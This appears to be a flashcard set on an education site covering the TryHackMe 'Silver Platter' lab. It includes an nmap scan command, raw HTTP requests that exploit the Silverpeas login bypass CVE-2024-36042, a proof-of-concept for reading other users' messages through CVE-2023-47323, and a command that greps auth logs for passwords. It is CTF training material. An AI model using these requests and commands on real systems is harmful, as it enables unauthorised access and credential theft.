THM-Silver Platter
Flashcard
•
Information Technology (IT)
•
Professional Development
•
Practice Problem
•
Easy
Tamal Mazumder
Used 2+ times
FREE Resource
Student preview
5 questions
Show all answers
1.
FLASHCARD QUESTION
Front
What command is used to perform a service version detection scan with Nmap?
Back
nmap -sC -sV -vv -T4 10.10.245.41 --unprivileged
2.
FLASHCARD QUESTION
Front
Where can you find the directory list for web content?
3.
FLASHCARD QUESTION
Front
What is the CVE identifier for the Silverpeas authentication bypass vulnerability?
Back
CVE-2024-36042
-------------------------------------------------
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&Password=SilverAdmin&DomainId=0
---------
POST /silverpeas/AuthenticationServlet HTTP/2
Host: 212.129.58.88
Content-Length: 28
Origin: https://212.129.58.88
Content-Type: application/x-www-form-urlencoded
Login=SilverAdmin&DomainId=0
-------------------------------------------------
4.
FLASHCARD QUESTION
Front
What is the CVE identifier for the Broken Access Control vulnerability in Silverpeas?
Back
CVE-2023–47323
Proof-of-Concept Exploit
Description
The notification/messaging feature of Silverpeas Core 6.3.1 does not enforce access control on the ID parameter. This allows an attacker to read all messages sent between other users; including those sent only to administrators.
Usage/Exploitation
To exploit this vulnerability, an attacker can use a script or Burp Suite Intruder to view all messages by attacking the ID parameter in this URL: http://localhost:8080/silverpeas/RSILVERMAIL/jsp/ReadMessage.jsp?ID=[messageID] - the messages begin at "1" and increase in intervals of 1.
5.
FLASHCARD QUESTION
Front
What command can be used to check user log accessibility and passwords?
Back
cat /var/log/auth* | grep -ai -e 'USER-NAME' -e 'pass' -e 'ssh'.
Access all questions and much more by creating a free account
Create resources
Host any resource
Get auto-graded reports
Continue with Google
Continue with Email
Continue with Classlink
Continue with Clever
or continue with
Microsoft
%20(1).png)
Apple
Others
Already have an account?
Popular Resources on Wayground
8 questions
2 Step Word Problems
Quiz
•
KG - University
20 questions
Comparing Fractions
Quiz
•
4th Grade
15 questions
Fractions on a Number Line
Quiz
•
3rd Grade
20 questions
Equivalent Fractions
Quiz
•
3rd Grade
25 questions
Multiplication Facts
Quiz
•
5th Grade
10 questions
Latin Bases claus(clois,clos, clud, clus) and ped
Quiz
•
6th - 8th Grade
22 questions
fractions
Quiz
•
3rd Grade
7 questions
The Story of Books
Quiz
•
6th - 8th Grade